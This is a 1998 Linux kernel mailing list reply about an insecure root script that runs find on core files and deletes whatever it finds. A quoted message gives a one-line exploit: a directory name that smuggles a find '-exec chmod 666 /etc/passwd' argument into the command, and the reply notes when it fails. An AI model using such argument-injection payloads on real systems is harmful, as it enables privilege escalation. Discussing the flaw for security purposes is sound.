> On Mon, 26 Oct 1998, Khimenko Victor wrote:
>
> > In <199810260025.TAA13771@alcove.wittsend.com> Michael H. Warfield
> > (mhw@wittsend.com) wrote:
> > MW> Khimenko Victor enscribed thusly:
> > >> 25-Oct-98 20:01 you wrote:
> > >> > Hi Michael.
> >
> > >> >>> % Already tried, and he's not interested, but I did find out
> > >> >>> % what script he's using...
> > >> >>> %
> > >> >>> % Q> #!/bin/sh
> > >> >>> % Q> XYZZY="`find / -name core`"
> > >> >>> % Q> for LOOP in `find $XYZZY | sort -ru` ; do
> > >> >>> % Q> rm -fr $LOOP
> > >> >>> % Q> done
> >
<snip>
> You asked for an exploit of that exact script, here's one that works
>
> mkdir -p ' -exec chmod 666 /etc/passwd ; -o -name /core'
>
> You don't need any shell metachars to make it execute any command you
> want.
That will only work if your directory contains the last core file that
find encounters. Otherwise, find will complain because it finds more
paths after the expression, and not do anything.
-Scott
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/